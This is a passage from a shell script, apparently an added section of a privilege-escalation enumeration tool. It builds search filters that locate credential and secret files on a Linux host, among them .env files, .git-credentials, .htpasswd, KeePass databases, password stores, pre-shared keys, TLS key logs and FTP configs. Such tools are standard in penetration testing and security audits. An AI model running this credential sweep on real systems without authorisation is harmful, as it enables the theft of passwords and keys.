"^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "aliases$|postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*_history.*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'example' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.env.*$" | sort | uniq | head -n 70) + PSTORAGE_PROXY_CONFIG=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '^/etc/environment$' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "environment$|apt\.conf$|apt\.conf\.d$" | sort | uniq | head -n 70) + PSTORAGE_SNIFFING_ARTIFACTS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.pcap$|.*\.pcapng$|keys\.log$|sslkeylog\.log$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.psk$" | sort | uniq | head -n 70) + PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.password-store$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "vsftpd\.conf$|.*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_SAMBA=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "smb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_DNS=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc|^${ROOT_FOLDER}var|^${ROOT_FOLDER}usr" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 